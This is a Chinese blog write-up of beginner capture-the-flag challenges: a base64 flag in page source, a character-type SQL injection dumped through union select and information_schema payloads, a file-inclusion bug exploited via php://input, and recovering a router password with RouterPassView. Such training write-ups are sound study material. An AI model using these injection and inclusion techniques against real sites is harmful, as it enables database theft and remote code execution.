CTF小做

已于 2023-10-15 01:16:28 修改
阅读量159 收藏
点赞数
文章标签: oracle sql 数据库
于 2023-10-15 01:14:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74020399/article/details/133822764
版权

web签到题

打开得到以上,f12找到相关线索

base64解码得到flag

web2

得到注入点,万能密码尝试注入:

登入成功,发现该网站属于单引号字符型注入

开始查询:admin' or 1=1 union select 1,2,3#

找到数据库的库名:admin' or 1=1 union select 1,database(),3#

 得到web2,

继续查询:a' union select 1,(select group_concat(table_name) from information_schema.tables
where table_schema='web2'),3 #

接下来获取flag表的字段:

a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #

得到回显flag

接下来获取flag表的数据:a' union select 1,(select flag from flag),3 #

得到flag

web3 

打开得到:

明显的一个文件包含漏洞

bp抓包,用php://input(可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。)协议尝试绕过。

这里运用input协议将下面的post 传的php语句

得到:一个链接直接打开:

得到flag。

荷兰宽带数据泄露

打开发现是一个格式为

.bin

的东西,与题目名联系起来尝试使用RouterPassView打开

知识点:路由器的备份文件通常包含了像ISP的用户名重要数据/密码、路由器的登录密码,是无线网络的关键。如果不小心失去了这些密码/钥匙,也可以通过路由器配置的备份文件找回。RouterPassView就是一个找回路由器密码的工具,可以帮助你从路由器中恢复丢失的密码。

 结合知识点尝试将搜索出的username和password分别带入flag中尝试发现flag是username。

梅琳娜等等我
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
ctf加解密小结
08-15
加解密技术是计算机网络安全领域的重要组成部分,尤其在CTF(Capture The Flag)比赛中,密码学的题目尤为常见。CTF是一种信息安全竞赛,参赛者需要解决各种与计算机安全相关的谜题以获得积分,最终争取“夺旗”。...
buuoj 荷兰宽带数据泄露 writeup
m0_73605862的博客
05-28 921
【来源】(buuoj)https://buuoj.cn/challenges#%E8%8D%B7%E5%85%B0%E5%AE%BD%E5%B8%A6%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2。Step4:将这些密码不断地进行暴力破解,一个一个试,然后发现第二个上面有一个Username,需要将username也放入考虑范围内,结果刚好username的value就是flag。【思路】运用RouterPassView查看密码。【题目】荷兰宽带数据泄露
CTF-新手misc
摘星怪sec的blog
04-24 941
流量分析使用题目得到密码,由于是网站登录,打开之后过滤http 清除看到login,点开得到flag{ffb7567a1d4f4abdffdb54e022f8facd}荷兰宽带数据泄露下载之后是bin后缀的二进制文件,使用RouterPassview搜索关键字username和password,最终flag是username后门查杀下载之后是个HTML文件,按照描述有后门且答案是MD5,使用D盾扫出来,在搜索pass密码即可文件中的秘密。
BUUCTF刷题记录——MISC部分解答(三)
u013119911的博客
07-20 1235
CTF Misc
BUUCTF 荷兰宽带数据泄露 1
YueXuan_521的博客
11-15 642
BUUCTF 荷兰宽带数据泄露 1
CTF-misc练习(https://buuoj.cn)之第一页
weixin_46801402的博客
11-22 2291
CTF-misc练习(https://buuoj.cn)之第一页
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
buuctf学习记录-misc(002-010)
龟速更新的九某人
08-15 2125
buuctf学习记录-misc:002 梅花香之苦寒来;003 snake;004 荷兰宽带数据泄露;005 二维码;006 镜子里面的世界;007 N种方法解决;008 easycap;009 来首歌吧;010 voip
buuctf-misc-28.荷兰宽带数据泄露
weixin_49765221的博客
05-05 379
打开是一个bin文件,是宽带数据文件,需要用RouterPassView打开,找到user对应的数字就是flag。
BUUCTF靶场[MISC]荷兰宽带数据泄露、九连环
最新发布
m0_73981089的博客
05-14 1097
RouterPassView——路由器密码查看工具、Steghide隐写、伪加密、010 editor、foremost分离、kali
BUUCTF-刷题记录-6
qq_45628145的博客
10-03 953
MISC 菜刀666 在tcp的第7个流里面发现传输了一张图片 foremost分离出来一个带有密码的压缩包,把图片给提取出来,得到密码 解压得到flag [UTCTF2020]basic-forensics 给了一个jpeg,但其实不是,修改为txt,直接全局搜索flag就看到了flag 荷兰宽带数据泄露 使用routerpassview工具查看路由器配置文件里面存的的用户名即可,flag即为用户名 webshell后门 D盾扫一下,发现后门文件 然后搜索pass就可以看得到密码,也就是flag
【BUUCTF】MISC(第一页wp)
leekos的博客,分享web安全相关知识~
12-29 1071
【BUUCTF】MISC(第一页wp)
buuctf-Misc 题目解答28-30
shelbytt的博客
11-05 208
用Notepad++ 打开发现有flag.vmx 改后缀为zip 后发现解压需要密码,怀疑是伪加密,用binwalk 尝试分析。能分析出来flag.vmdk,用Notepad++ 打开,发现flag 但是提示还有第二部分。最后拿到flag flag{N7F5_AD5_i5_funny!依然听到了电报声,摩斯密码 用 Audacity打开。flag 看样子就是账号或者密码了,最后拿到flag。用7z解压得到两部分数据,最好用kali 中的7z。解密后得到_i5_funny!同时发现了大量的加密数据。
buuctf_misc_荷兰宽带数据泄露+被偷走的文件
m0_73118788的博客
03-01 324
只是我想不到的是,flag这算是username(ctrl+F查)没啥,工具给大家放这了,这个(相对来说)比较安全。打开后,.bin文件直接托进去。
buuctf-misc题目练习三
2401_82760239的博客
05-10 358
大多数现代路由器允许备份到一个文件路由器的配置,然后从文件中恢复配置时的需要。路由器的备份文件通常包含了像ISP的用户名重要数据/密码,路由器的登录密码,无线网络的关键。看一下里面有没有什么其他的文件之类的,发现里面包含一个flag.txt的文件,用formost分离后得到flag。根据题目提示将账号和密码拼接在一起为adminaadminb,然后找一个工具将他的md5哈希值算一下。追踪tcp,发现里面有一个压缩包,用formost分离之后发现需要密码,四位数字掩码爆破即可得到flag。
ctfshow misc buuctf misc
weixin_74228275的博客
07-10 913
分别打开part_one,part_two文件,一个为brainfuck解密,一个为Ook解密,拼接得到flag。该文件应该是宽带数据流量,用routerpassview打开,找到用户名。将分离出的压缩包放入010 editor 中,发现为伪加密,改一下数据。打开压缩包,发现为brainfuck解密,要删除最后一句,否则有错误。打开压缩包,发现文件被加密,应该为伪加密,打开ZipCenOp.打开其中一个图片,根据盲文对照表,翻译过来是:kmdonowg。用这个密码打开压缩包,是一段音频,像是摩斯密码。
RSA e很小 ctf
10-15
CTF比赛中,有时候会出现RSA e很小的情况,这时候可以使用低指数攻击(Low-Exponent Attack)来破解RSA加密。 低指数攻击的基本思想是:如果明文m比较小,而e也比较小,那么可以通过对密文c进行多次开方,最终...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值